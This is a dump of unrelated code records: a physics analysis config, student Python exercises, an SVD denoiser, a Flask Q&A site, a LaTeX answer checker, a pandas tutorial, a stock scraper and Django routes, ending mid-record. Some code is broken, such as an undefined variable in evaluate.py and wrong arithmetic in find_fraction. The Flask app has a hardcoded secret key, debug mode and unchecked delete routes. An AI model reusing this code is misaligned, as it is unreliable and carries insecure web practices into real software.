{\n \"pt\": 20,\n \"eta\": 2.5,\n \"iso\": 0.15,\n },\n \"loose\": {\n \"pt\": 20,\n \"eta\": 2.2,\n \"iso\": 0.15,\n },\n \"loose_veto\": {\n \"pt\": 10,\n \"eta\": 2.2,\n \"iso\": 0.04,\n },\n \"isotype\": \"relIso03\",\n \"dxy\": 0.04,\n }\n }\n self.leptons[\"mu\"][\"tight_veto\"] = self.leptons[\"mu\"][\"loose\"]\n\n self.jets = {\n \"pt\": 30,\n \"eta\": 2.5,\n\n #The default b-tagging algorithm (branch name)\n \"btagAlgo\": \"btagCSV\",\n\n #The default b-tagging WP\n \"btagWP\": \"CSVM\",\n\n #These working points are evaluated and stored in the trees as nB* - number of jets passing the WP\n #https://twiki.cern.ch/twiki/bin/view/CMSPublic/SWGuideBTagging#Preliminary_working_or_operating\n \"btagWPs\": {\n \"CSVM\": (\"btagCSV\", 0.814),\n \"CSVL\": (\"btagCSV\", 0.423),\n \"CSVT\": (\"btagCSV\", 0.941)\n },\n\n #if btagCSV, untagged/tagged selection for W mass and MEM is done by CSVM cut\n #if btagLR, selection is done by the btag likelihood 
ratio permutation\n \"untaggedSelection\": \"btagCSV\"\n }\n\n self.general = {\n \"controlPlotsFileOld\": os.environ[\"CMSSW_BASE\"]+\"/src/TTH/MEAnalysis/root/ControlPlotsTEST.root\",\n \"controlPlotsFile\": os.environ[\"CMSSW_BASE\"]+\"/src/TTH/MEAnalysis/root/ControlPlotsV6.root\",\n \"sampleFile\": os.environ[\"CMSSW_BASE\"]+\"/src/TTH/MEAnalysis/python/samples_vhbb.py\",\n \"transferFunctionsPickle\": os.environ[\"CMSSW_BASE\"]+\"/src/TTH/MEAnalysis/root/transfer_functions.pickle\",\n \"transferFunctions_sj_Pickle\": os.environ[\"CMSSW_BASE\"]+\"/src/TTH/MEAnalysis/root/transfer_functions_sj.pickle\",\n\n #If the list contains:\n # \"gen\" - print out the ttH gen-level particles (b from top, b form higgs, q from W, leptons\n # \"reco\" - print out the reco-level selected particles\n # \"matching\" - print out the association between gen and reco objects\n #\"verbosity\": [\"eventboundary\", \"input\", \"matching\", \"gen\", \"reco\"],\n \"verbosity\": [],\n\n #Process only these events (will scan through file to find)\n #\"eventWhitelist\": [\n # (1, 1201, 120035),\n # #(1, 626, 62574),\n # #(1, 180, 17914)\n #]\n }\n\n self.mem = {\n\n #Actually run the ME calculation\n #If False, all ME values will be 0\n \"calcME\": True,\n #\"calcME\": False,\n\n #Which categories to analyze the matrix element in\n \"MECategories\": [\"cat1\", \"cat2\", \"cat3\", \"cat6\"],\n #\"MECategories\": [\"cat1\"],\n\n #If bLR > cut, calculate ME\n #only used if untaggedSelection=btagLR\n \"btagLRCut\": {\n \"cat1\": -100.0,\n \"cat2\": -100.0,\n \"cat3\": -100.0,\n \"cat6\": -100.0\n },\n\n #if a number is N specified for wq, tb, hb (+ _btag), require\n #that reco jets dR matched to quarks from W, top, higgs >= N\n #in order to calculate the ME.\n #If disabled, calculate ME regardless of gen-level matching\n \"requireMatched\": {\n #\"cat2\": {\n # \"wq_btag\": 1,\n # \"hb_btag\": 2,\n # \"tb_btag\": 2,\n #},\n #\"cat1\": {\n # \"wq_btag\": 2,\n # \"hb_btag\": 2,\n # \"tb_btag\": 2,\n #},\n #\"cat3\": {\n # \"wq_btag\": 1,\n # \"hb_btag\": 2,\n # \"tb_btag\": 2,\n #},\n },\n\n \"methodsToRun\": [\n\n #full ME\n \"default\",\n \"oldTF\",\n \"MissedWQ\",\n\n #These are additional MEM checks, where only part of the MEM is ran.\n #Switched off by default\n\n \"NumPointsDouble\",\n \"NumPointsHalf\",\n #\"NoJacobian\",\n #\"NoDecayAmpl\",\n #\"NoPDF\",\n #\"NoScattAmpl\",\n #\"QuarkEnergy98\",\n #\"NuPhiRestriction\",\n #\"JetsPtOrder\",\n #\"JetsPtOrderIntegrationRange\",\n \"Recoil\",\n \"Sudakov\",\n \"Minimize\",\n ],\n\n }\n","sub_path":"MEAnalysis/python/MEAnalysis_cfg_heppy.py","file_name":"MEAnalysis_cfg_heppy.py","file_ext":"py","file_size_in_byte":6089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"264872605","text":"#1\n\n#ex34\n# animals = ['bear', 'python3.6', 'peacock', 'kangaroo', 'whale', 'platypus']\n#\n# 1. bear\n# 2. python3.6\n# 3. bear\n# 4. peacock\n# 5. kangaroo\n# 6. python3.6\n# 7. whale\n# 8. 
kangaroo\n\n#2\n#create function and argument\nx = int(input(\"Enter the time in minutes you want to convert to seconds > \"))\n#create a variable asking for input, do math and print\ndef sec (x):\n y= x * 60 + 42\n print(f\"There are this many {y} seconds\")\n\nsec(x)\n#call function\n\n#3\n#create a variable that takes input\nkilo = int(input(\"Enter the amount of kilometers you want to convert: > \"))\ndef conv(kilo):\n#create function\n mile = kilo / 1.61\n #do math and print result\n print(f\"There are this many miles {mile}\")\n\nconv(kilo)\n#pull function\n\n\n#4\nfaren = int(input(\"Enter the degrees in fahrenheight that you want to convert to celsius: > \"))\n#assign variable to input integer\ndef conv1(faren):\n #define function\n #do math and store in variable\n c = ((faren - 32) * (5/9))\n print(f\"{faren} degrees in farenheight is {c} degrees celsius\")\n\nconv1(faren)\n #call function\n\n\n#5\nimport math\n#import math library\nz = int(input(\"Enter one of the numbers 81, 19, 16, 121 to get the square root of it \"))\n#make if elif statements to print sqrt of the number input\nif z == 81:\n print(f\"The square root of {z} is {math.sqrt(z)}\")\n\nelif z == 19:\n print(f\"The square root of {z} is {math.sqrt(z)}\")\n\nelif z == 16:\n print(f\"The square root of {z} is {math.sqrt(z)}\")\n\nelif z == 121:\n print(f\"The square root of {z} is {math.sqrt(z)}\")\n\nelse:\n print(\"Wrong number mate! \")\n#make an else for other numbers they input\n\n#6\n#returns area of a circle r = 9\nr = int(input(\"Enter the radius you want to get the area of \"))\n#make function and do the math math.pi represents pi ** is square\ndef area(r):\n a = (r ** 2) * math.pi\n print(f\"Area of {r} is {a} \")\n#call function\narea(r)\n\n\n#7\n#create input\n\n#define x in the strings\n\n#make if else statements if x in num6 then return true and print it otherwise false\nnum6 =str(input(\"Type a string in here >> \"))\n#\ndef xinsid(num6):\n if (\"x\" in num6):\n print(True)\n return True\n\n else:\n print(False)\n return False\n\nxinsid(num6)\n#call function\n\n#8\n#boolean function that returns true false if letters are a,e,i,o,u and in string by user\nnum7 = input(\"Type something in here >\")\nprint(num7)\n\ndef aeiou(num7):\n letters= [\"a\", \"e\", \"i\", \"o\", \"u\"]\n print(letters[0])\n print(len(letters))\n for i in range(len(letters)):\n if (letters[i] in num7):\n print(True)\n return True\n\n else:\n print(False)\n return False\n\naeiou(num7)\n\n#9 slack\n\n#write function\n\ndef rad6(v):\n r6 = (4/3) * math.pi*v**3\n print(r6)\n\nrad6(5)\n\n#10\n#make function, take an input\n#make if/else statement\n#do math inside and print and return true false\n#call function\nw = int(input(\"Enter a number to divide by 3: \"))\n\ndef num10(w):\n if w % 3 == 0:\n print(True)\n return True\n\n else:\n print(False)\n return False\nnum10(w)\n\n#11\n#do import datetime to get preset function\n#assign a variable to datetie.date.today() and print it\nimport datetime\nnow = datetime.date.today()\nprint (now)\n\n#12\n#do import datetime\n#assign variable to time formula and print variable\nimport datetime\ncurrent = datetime.datetime.now().time()\nprint(current)\n\n#13\n#type up input, then function\n#use count and put string in quotes for it to count that string\n#asssign it variable and print it\ng = input(\"Type in something here > \")\n\ndef acount(g):\n f = g.count('a')\n print(f\"{g} has an 'a' in it {f} times \")\n\nacount(g)\n\n\n\n#14\n#write an input and assign to variable\n#create function, have it 
print the length of the variable, and call the function\n\ne = input(\"Enter your word here >> \")\n\ndef wrdcnt(e):\n    print(f\"{e} has {len(e)} letters\")\n\nwrdcnt(e)\n\n#15\n#make function, leave it blank this time since we won't be taking input\n#start the count at 20, do a while loop and print what it counts\n#make count equal to itself minus 1 so it goes down each time the loop runs\n#call function\n\ndef cnt():\n    count = 20\n    while count >= 0:\n        print(count)\n        count = count - 1\n\ncnt()\n\n#16\n#make it divisible by 2 remainder 0 after writing the function\n#print even if true, else make it odd and call function\n\n\nk = int(input(\"Enter a number here > \"))\ndef numodd(k):\n    if k % 2 == 0:\n        print(\"This is even\")\n\n    else:\n        print(\"This is odd\")\n\nnumodd(k)\n\n\n#17\n#do the input\n\nl = input(\"Enter a string here > \")\ndef strlng(l):\n    counter = 0\n    for char in l:\n        counter += 1\n    print(counter)\n\nstrlng(l)\n\n#18\n#do the input, then count the characters with a while loop\nu = input(\"Enter a string here > \")\ni = 0\nwhile i < len(u):\n    i += 1\nprint(i)\n","sub_path":"classactiv9-23.py","file_name":"classactiv9-23.py","file_ext":"py","file_size_in_byte":4735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"385846814","text":"import numbers\nimport numpy as np\n\nfrom time import time\nfrom sklearn.utils.extmath import randomized_svd\n\nfrom ..feature import extract_patches\nfrom ..feature import reconstruct_patches\n\n\ndef low_rank_svd(data, rank, compute_uv = False):\n    u, s, v = randomized_svd(data, rank)\n    if compute_uv:\n        return u, s, v\n    else:\n        return s\n\n\ndef denoise_svd_single_image(img, patch_size, n_components, extraction_step=None, verbose=True):\n    if isinstance(patch_size, numbers.Number):\n        patch_size = tuple([patch_size] * 2)\n    img_height, img_width = img.shape\n    patch_height, patch_width = patch_size\n    num_patches = (img_height - patch_height + 1) * (img_width - patch_width + 1)\n\n    # Estimate extraction step\n    # extraction_step = int(np.ceil(np.sqrt(num_patches / 10000)))\n    if extraction_step is None:\n        extraction_step = int(patch_size[0]/4)\n    if verbose == True:\n        print('Extracting reference patches...')\n    t0 = time()\n    patches = extract_patches(img, patch_size, extraction_step)\n    patches = patches.reshape(patches.shape[0], -1)\n    if verbose == True:\n        print('done in %.2fs.' % (time() - t0))\n        print('Singular value decomposition...')\n    t0 = time()\n    u, s, v = randomized_svd(patches, n_components, random_state=0)\n    if verbose == True:\n        print('done in %.2fs.' % (time() - t0))\n        print('Reconstructing...')\n    t0 = time()\n    S = np.diag(s)\n    patches_ = np.dot(u, np.dot(S, v)).reshape(-1, patch_size[0], patch_size[1])\n    data = reconstruct_patches(patches_, img.shape, extraction_step)\n    if verbose == True:\n        print('done in %.2fs.' 
% (time() - t0))\n\n return data\n\ndef denoise_svd_stack(imgs, patch_size, n_components, extraction_step=None):\n imgfs = []\n print('denoising...')\n for i, img in enumerate(imgs):\n imgf = denoise_svd_single_image(img, patch_size, n_components, extraction_step, verbose=False)\n imgfs.append(imgf)\n print('{}, '.format(i), end='')\n return np.array(imgfs)\n\ndef denoise_svd_patch(data, patch_size, n_components, extraction_step=None, verbose=True):\n if len(data.shape) == 2:\n data_ = denoise_svd_single_image(data, patch_size, n_components, extraction_step, verbose=verbose)\n elif len(data.shape) == 3:\n data_ = denoise_svd_stack(data, patch_size, n_components, extraction_step)\n return data_\n\n\n# Denoise 2D or 3D image data using direct svd method\ndef denoise_svd_no_patch_single_image(data, rank):\n u, s, v = low_rank_svd(data, rank, compute_uv=True)\n S = np.diag(s)\n return np.dot(u, np.dot(S, v))\n\ndef denoise_svd_no_patch_stack(data, rank):\n return np.array([denoise_svd_no_patch_single_image(img, rank) for img in data])\n\ndef denoise_svd_no_patch(data, rank):\n if len(data.shape) == 2:\n data_ = denoise_svd_no_patch_single_image(data, rank)\n elif len(data.shape) == 3:\n data_ = denoise_svd_no_patch_stack(data, rank)\n return data_\n\n\ndef denoise_svd(data, rank, patch_size = None, extraction_step=None, verbose=True):\n if patch_size == None:\n data_ = denoise_svd_no_patch(data, rank)\n else:\n data_ = denoise_svd_patch(data, patch_size, rank, extraction_step, verbose=verbose)\n return data_\n\n\n\n\n\n\n","sub_path":"denoise/denoise_svd.py","file_name":"denoise_svd.py","file_ext":"py","file_size_in_byte":3256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"439261647","text":"from flask import Flask, session, redirect, url_for, escape, request, make_response, render_template, redirect, request, \\\n url_for\nimport data_manager\nfrom time import gmtime, strftime\n\napp = Flask(__name__)\napp.secret_key = b'_5#y2L\"F4Q8z\\n\\xec]/'\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n # return login_as_test()\n session.pop(\"user_name\", None)\n session.pop(\"type\", None)\n session.pop(\"registration\", None)\n\n if request.method == 'POST':\n username = request.form.get('user_name')\n password = request.form.get(\"password\")\n result_list = data_manager.get_line(username)\n if len(result_list) != 1:\n session[\"login\"] = \"wrong\"\n return redirect('/')\n user_row = result_list[0]\n if not data_manager.verify_password(password, user_row['password']):\n session[\"login\"] = \"wrong\"\n return redirect('/')\n session[\"user_name\"] = username\n if username == \"Admin\":\n session[\"type\"] = \"Admin\"\n else:\n session[\"type\"] = \"user\"\n return redirect(url_for(\"list\"))\n questions = data_manager.get_five_question()\n return render_template('index.html', question=questions)\n\n\ndef login_as_test():\n session[\"user_name\"] = \"baba\"\n session[\"type\"] = \"user\"\n return list()\n\n\n@app.route('/visitor')\ndef enter_as_visitor():\n session[\"user_name\"] = \"visitor\"\n session[\"type\"] = \"visitor\"\n return redirect(\"/list\")\n\n\n@app.route('/list', methods=['GET', 'POST'])\ndef list():\n if request.method == 'POST':\n word_for_search = request.form.get(\"search_phrase\")\n return redirect(url_for(\"result\", search_phrase=word_for_search))\n column = request.args.get(\"order_by\")\n direction = request.args.get(\"direction\")\n if column == None:\n column = \"message\"\n direction = \"ASC\"\n 
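    # data_manager.get_all_question (not part of this dump) is assumed to build an ORDER BY
    # clause from these two request-supplied values; a safe implementation would whitelist
    # them first, e.g. (hypothetical sketch, column names assumed):
    #     if column not in ("message", "submission_time") or direction not in ("ASC", "DESC"):
    #         column, direction = "message", "ASC"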
question = data_manager.get_all_question(column, direction)\n    my_id = data_manager.get_user_id(session[\"user_name\"])\n    return render_template(\"list.html\", question=question, my_id=my_id)\n\n\n@app.route('/registration', methods=['GET', 'POST'])\ndef registration():\n    session[\"type\"] = \"registration\"\n    if request.method == 'POST':\n        username = request.form.get('user_name')\n        password = request.form.get(\"password\")\n        hashed_pw = data_manager.hash_password(password)\n        try:\n            data_manager.save_user_data(username, hashed_pw)\n            session[\"user_name\"] = username\n            session[\"type\"] = \"user\"\n            return redirect(url_for(\"list\", user_name=username))\n        except:\n            session[\"registration\"] = \"used\"\n            return redirect(url_for('registration'))\n    return render_template('registration.html')\n\n\n@app.route('/logout')\ndef logout():\n    # remove the user name from the session if it's there\n    session.pop('user_name', None)\n    session.pop('type', None)\n\n    return redirect(url_for('index'))\n\n\n@app.route('/user/<user_id>')\ndef my_profile(user_id):\n    name = session[\"user_name\"]\n    profile = data_manager.my_profile(name)\n\n    my_questions = data_manager.get_my_questions(name)\n    my_answers = data_manager.get_my_answers(name)\n    my_comments = data_manager.get_my_comments(name)\n    return render_template(\"my_profile.html\", profile=profile, my_questions=my_questions, my_answers=my_answers,\n                           my_comments=my_comments)\n\n\n@app.route(\"/add-question\", methods=['POST', 'GET'])\ndef add_question():\n    new_question = ()\n    tags = data_manager.get_tags()\n    if request.method == 'POST':\n        new_question += (0,)\n        new_question += (0,)\n        new_question += (request.form.get('title'),)\n        new_question += (request.form.get('message'),)\n        new_question += (strftime(\"%Y-%m-%d %H:%M:%S\", gmtime()),)\n        new_question += (session[\"user_name\"],)\n        data_manager.add_new_question(new_question)\n        tags = request.form.getlist(\"tag\")\n        q_id = data_manager.get_max_question_id()\n        ques = q_id[0]\n        question_id = ques[\"max\"]\n        for tag_id in tags:\n            new_tag = (question_id, tag_id)\n            data_manager.save_tag(new_tag)\n        return redirect(url_for(\"list\"))\n    return render_template(\"add_question.html\", tags=tags)\n\n\n@app.route(\"/display_question_vote_up/<question_id>\")\ndef display_question_vote_up(question_id):\n    data_manager.view_number(question_id)\n    return redirect(url_for('display_question', question_id=question_id))\n\n\n@app.route(\"/display_question/<question_id>\")\ndef display_question(question_id):\n    question = data_manager.get_question(question_id)\n    answer = data_manager.get_answers(question_id)\n    question_comments = data_manager.get_question_comments(question_id)\n    answer_comments = data_manager.get_answer_comments(question_id)\n    tags = data_manager.get_tags_by_question_id(question_id)\n    print(question_comments)\n    print(session[\"user_name\"])\n    return render_template(\"display_question.html\", question=question, answer=answer,\n                           question_comments=question_comments, answer_comments=answer_comments, tags=tags)\n\n\n@app.route('/display_question/<question_id>/add_answer', methods=['POST', 'GET'])\ndef add_answer(question_id):\n    new_answer = ()\n    if request.method == 'POST':\n        new_answer += (0,)\n        new_answer += (question_id,)\n        new_answer += (request.form.get('ans'),)\n        new_answer += (strftime(\"%Y-%m-%d %H:%M:%S\", gmtime()),)\n        new_answer += (session[\"user_name\"],)\n        new_answer += (0,)\n        data_manager.add_new_answer(new_answer)\n        return redirect(url_for('display_question', question_id=question_id))\n    return render_template('add_answer.html', 
question_id=question_id)\n\n\n@app.route('/display_question/<question_id>/delete_question')\ndef delete_question(question_id):\n    data_manager.delete_tags(int(question_id))\n    data_manager.delete_all_comment(int(question_id))\n    data_manager.delete_all_answer(int(question_id))\n    data_manager.delete_question(int(question_id))\n    return redirect('/list')\n\n\n@app.route('/question/<question_id>/edit', methods=['POST', 'GET'])\ndef edit_question(question_id):\n    question_to_edit = data_manager.get_question(question_id)\n    if request.method == 'POST':\n        new_title = ()\n        new_message = ()\n        new_title += (request.form.get('title'),)\n        new_message += (request.form.get('message'),)\n        data_manager.write_edited_question(new_title, new_message, question_id)\n        return redirect(url_for(\"display_question\", question_id=question_id))\n    return render_template('edit_question.html', question_to_edit=question_to_edit)\n\n\n@app.route('/answer/<answer_id>/edit', methods=['POST', 'GET'])\ndef edit_answer(answer_id):\n    answer_to_edit = data_manager.get_one_answer(answer_id)\n    if request.method == 'POST':\n        new_answer = (request.form.get('ans'),)\n        data_manager.edit_answer(new_answer, answer_id)\n        result = data_manager.get_question_id(answer_id)\n        res = result[0]\n        question_id = res[\"question_id\"]\n        return redirect(url_for('display_question', question_id=question_id, ))\n    return render_template('edit_answer.html', answer_to_edit=answer_to_edit)\n\n\n@app.route('/display_question/<question_id>/question_vote_up')\ndef question_vote_up(question_id):\n    value = 5\n    reputation_by_question_id(value, question_id)\n    data_manager.question_vote_up(question_id)\n    return redirect(url_for('display_question', question_id=question_id, ))\n\n\n@app.route('/display_question/<question_id>/question_vote_down')\ndef question_vote_down(question_id):\n    value = -2\n    reputation_by_question_id(value, question_id)\n    data_manager.question_vote_down(question_id)\n    return redirect(url_for('display_question', question_id=question_id, ))\n\n\n@app.route('/display_question/<question_id>/delete_answer/<answer_id>')\ndef delete_answer(question_id, answer_id):\n    data_manager.delete_all_comment(int(question_id))\n    data_manager.delete_all_answer(int(question_id))\n    data_manager.delete_one_answer(answer_id)\n    return redirect(url_for('display_question', question_id=question_id))\n\n\n@app.route('/answer/<answer_id>/vote_up')\ndef answer_vote_up(answer_id):\n    result = data_manager.get_question_id(answer_id)\n    res = result[0]\n    question_id = res[\"question_id\"]\n    value = 10\n    reputation_by_answer_id(value, answer_id)\n    data_manager.answer_vote_up(answer_id)\n    return redirect(url_for('display_question', question_id=question_id))\n\n\n@app.route('/answer/<answer_id>/vote_down')\ndef answer_vote_down(answer_id):\n    result = data_manager.get_question_id(answer_id)\n    res = result[0]\n    question_id = res[\"question_id\"]\n    value = -2\n    reputation_by_answer_id(value, answer_id)\n    data_manager.answer_vote_down(answer_id)\n    return redirect(url_for('display_question', question_id=question_id))\n\n\n@app.route('/search?q=<search_phrase>')\ndef result(search_phrase):\n    word = \"%\" + search_phrase + \"%\"\n    questions = data_manager.get_result_q(word)\n    answer = data_manager.get_result_a(word)\n    return render_template('result.html', questions=questions, answer=answer)\n\n\n@app.route('/question/<question_id>/new-comment', methods=['POST', 'GET'])\ndef add_comment_to_question(question_id):\n    if request.method == \"POST\":\n        comment = ()\n        comment += (question_id,)\n        comment += (request.form.get(\"question_comment\"),)\n        comment += (strftime(\"%Y-%m-%d %H:%M:%S\", gmtime()),)\n        comment += 
(session[\"user_name\"],)\n data_manager.add_question_comment(comment)\n return redirect(url_for(\"display_question\", question_id=question_id))\n return render_template(\"comment_question.html\", question_id=question_id)\n\n\n@app.route('/answer//new-comment', methods=['POST', 'GET'])\ndef add_comment_to_answer(answer_id):\n ques_id = data_manager.get_question_id(answer_id)\n q_id = ques_id[0]\n question_id = q_id['question_id']\n if request.method == \"POST\":\n comment = ()\n comment += (question_id,)\n comment += (answer_id,)\n comment += (request.form.get('answer_comment'),)\n comment += (strftime(\"%Y-%m-%d %H:%M:%S\", gmtime()),)\n comment += (session['user_name'],)\n data_manager.add_answer_comment(comment)\n return redirect(url_for('display_question', question_id=question_id))\n return render_template(\"comment_answer.html\", answer_id=answer_id, question_id=question_id)\n\n\n@app.route('/comment//edit', methods=['GET', 'POST'])\ndef edit_question_comment(comment_id):\n comment = data_manager.get_one_comment(comment_id)\n comm = comment[0]\n question_id = comm[\"question_id\"]\n if request.method == \"POST\":\n new_comment = request.form.get(\"new_question_comment\")\n data_manager.edit_comment(new_comment, comment_id)\n return redirect(url_for(\"display_question\", question_id=question_id))\n return render_template(\"edit_question_comment.html\", comment=comment)\n\n\n@app.route('/comment//delete/')\ndef delete_question_comment(comment_id, question_id):\n data_manager.delete_question_comments(comment_id)\n return redirect(url_for(\"display_question\", question_id=question_id))\n\n\n@app.route('/userlist')\ndef list_of_users():\n user_list = data_manager.get_all_user()\n user_name = data_manager.get_user_id(session[\"user_name\"])\n\n return render_template(\"list_of_users.html\", user_list=user_list, user_name=user_name)\n\n\ndef reputation_by_question_id(value, question_id):\n user_name_list = data_manager.get_user_name_by_question_id(question_id)\n user_dict = user_name_list[0]\n user_name = user_dict[\"user_name\"]\n data_manager.reputation_handler(user_name, value)\n\n\ndef reputation_by_answer_id(value, answer_id):\n user_name_list = data_manager.get_user_name_by_answer_id(answer_id)\n user_dict = user_name_list[0]\n user_name = user_dict[\"user_name\"]\n data_manager.reputation_handler(user_name, value)\n\n\n@app.route('/accept_answer/')\ndef accept_answer(answer_id):\n value = 15\n reputation_by_answer_id(value, answer_id)\n data_manager.set_answered(answer_id)\n result = data_manager.get_question_id(answer_id)\n res = result[0]\n question_id = res[\"question_id\"]\n return redirect(url_for(\"display_question\", question_id=question_id))\n\n\n@app.route('/tags')\ndef tag_list():\n tags = data_manager.count_tags()\n return render_template(\"tags.html\", tags=tags)\n\n\ndef reg_vote(question_id):\n new_voter = session[\"user_name\"]\n result_str = data_manager.check_question_to_vote(question_id)\n result = result_str[0]\n my_str = result[\"voted_by\"]\n my_str += new_voter + \"-\"\n data_manager.reg_question_to_vote(question_id, my_str)\n\n\ndef check_vote(question_id):\n result_str = data_manager.check_question_to_vote(question_id)\n result = result_str[0]\n my_str = result[\"voted_by\"]\n converted_list = list(my_str.split(\"-\"))\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":13010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} 
+{"seq_id":"112610542","text":"#!/usr/bin/env python3.6\n\nimport sys\nfrom argparse import ArgumentParser\n\nfrom checks import equiv_symbolic, string_match, is_expanded\nfrom checks import parse_checks, check_func\n\ndef parse_args():\n parser = ArgumentParser()\n parser.add_argument('-i', dest='input',\n action='store', type=str, default=None,\n help=\"input LaTeX string (a student's answer)\")\n parser.add_argument('-e', dest='expected',\n action='store', type=str, default=None,\n help='expected string against which the comparison '\n 'is being done (the correct answer)')\n parser.add_argument('-s', dest='checks',\n action='store', type=str, default=None,\n help='check options with suboptions')\n args = parser.parse_args()\n\n if args.input is None or\\\n args.expected is None or\\\n args.checks is None:\n parser.print_help()\n sys.exit(0)\n\n check_list = parse_checks(args.checks)\n \n return args.input.strip('$'), args.expected.strip('$'), check_dict\n\nif __name__ == '__main__':\n input_latex, expected_latex, checks = parse_args()\n\n # perform all checks\n for check in checks:\n result = check_func[check](input_latex, expected_latex, checks[check])\n if result != 'true':\n print(result)\n break\n else:\n print('true')\n","sub_path":"evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"220331354","text":"# File find_fraction.py\n\n\"\"\"\nприймає 1 аргумент -- невід'ємне ціле число summ, \nта повертає тьюпл, що містить 2 цілих числа --\nчисельник та знаменник найбільшого правильного\nнескорочуваного дробу, для якого сума чисельника\nта знаменника дорівнює summ.\nПовернути False, якщо утворити такий дріб неможливо.\n\"\"\"\n\ndef find_fraction(summ):\n if summ < 3:\n return False\n half = summ / 2\n if summ % 2 == 0:\n if half % 2 == 0:\n return (half - 1, half + 1)\n else:\n return (half - 2, half + 2)\n else:\n return (half - 0, half + 1)\n","sub_path":"prometheus/find_fraction.py","file_name":"find_fraction.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"470157590","text":"from django.urls import path\nfrom . 
import views\n\napp_name = 'absensi'\n\nurlpatterns = [\n # path('')\n path('absen/', views.Scan, name='absen'),\n # path('keluar/', views.keluar, name='keluar'),\n # path('kendala/', include('covid19_apps.urls', namespace='kendala')),\n path('', views.index, name='list'),\n # path('logout/', views.singout, name='logout'),\n]\n","sub_path":"absensi_apps/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"35282427","text":"import subprocess\nimport json\nfrom urllib2 import urlopen\nimport time\n\nwhile 1:\n\n url = 'http://finance.google.com/finance/info?client=ig&q=Dow:AXP,%20AAPL,%20BA,%20CAT,%20CSCO,%20CVX,%20DD,%20XOM,%20GE,%20GS,%20HD,%20IBM,%20INTC,%20JNJ,%20KO,%20JPM,%20MCD,%20MMM,%20MRK,%20MSFT,%20NKE,%20PFE,%20PG,%20TRV,%20UNH,%20UTX,%20VZ,%20V,%20WMT,%20DIS'\n\n connection = urlopen(url)\n\n page = connection.read()\n keepers = [\"e\",\"t\",\"l\",\"lt_dts\"]\n\n obj = json.loads(page[3:])\n for quote in obj:\n for k in quote.keys():\n if k not in keepers:\n del quote[k]\n elif k==\"lt_dts\":\n quote[k] = quote[k].replace(\"T\",\" \").replace(\"-\",\"/\").replace(\"Z\",\"\")\n quote = json.dumps(quote)\n subprocess.call(['curl','-X','POST','http://192.168.168.234:9200/stocks/quotes/', '-d',quote])\n time.sleep(1)\n","sub_path":"stockscraper.py","file_name":"stockscraper.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"208534286","text":"from pandas import Series, DataFrame\nimport pandas as pd\nimport numpy as np\n\n# 5.1\n\n## 5.1.1 Series\nobj = Series([4, 7, -5, 3])\nobj\n\nobj.values\nobj.index\n\nobj2 = Series([4, 7, -5, 3], index=['d', 'b', 'a', 'c'])\nobj2\n\nobj2.index\nobj2['a']\n\nobj2['d'] = 6\nobj2[['c', 'a', 'd']]\n\nobj2[obj2 > 0]\n\nobj2 * 2\n\n'b' in obj2\n'e' in obj2\n\nsdata = {'Ohio': 35000, 'Texas': 71000, 'Oregon': 16000, 'Utah': 5000}\nobj3 = Series(sdata)\nobj3\n\nstates = ['California', 'Ohio', 'Oregon', 'Texas']\nobj4 = Series(sdata, index=states)\nobj4\n\npd.isnull(obj4)\n\npd.notnull(obj4)\n\nobj4.isnull()\n\nobj3\nobj4\nobj3 + obj4\n\n\n## 5.1.2 DataFrame\ndata = {'state': ['Ohio', 'Ohio', 'Ohio', 'Nevada', 'Nevada'],\n 'year': [2000, 2001, 2002, 2001, 2002],\n 'pop': [1.5, 1.7, 3.6, 2.4, 2.9]}\nframe = DataFrame(data)\n\nframe\n\nDataFrame(data, columns=['year', 'state', 'pop'])\n\nframe2 = DataFrame(data, columns=['year', 'state', 'pop', 'debt'],\n index=['one', 'two', 'three', 'four', 'five'])\nframe2\n\nframe2.columns\n\nframe2['state']\n\nframe2.year\n\nframe2.ix['three']\n\nframe2['debt'] = 16.5\nframe2\n\nframe2['debt'] = np.arange(5.)\nframe2\n\nval = Series([-1.2, -1.5, -1.7], index=['two', 'four', 'five'])\nframe2['debt'] = val\nframe2\n\nframe2['eastern'] = frame2.state == 'Ohio'\nframe2\ndel frame2['eastern']\nframe2.columns\n\n\npop = {'Nevada': {2001: 2.4, 2002: 2.9},\n 'Ohio': {2000: 1.5, 2001: 1.7, 2002: 3.6}}\nframe3 = DataFrame(pop)\nframe3\n\nframe3.T\n\nDataFrame(pop, index=[2001, 2002, 2003])\n\npdata = {'Ohio': frame3['Ohio'][:-1],\n 'Nevada': frame3['Nevada'][:2]}\nDataFrame(pdata)\n\nframe3.index.name = 'year'; frame3.columns.name = 'state'\nframe3\n\nframe3.values\n\nframe2.values\n","sub_path":"ch05/5-1.py","file_name":"5-1.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"598713668","text":"from rest_framework 
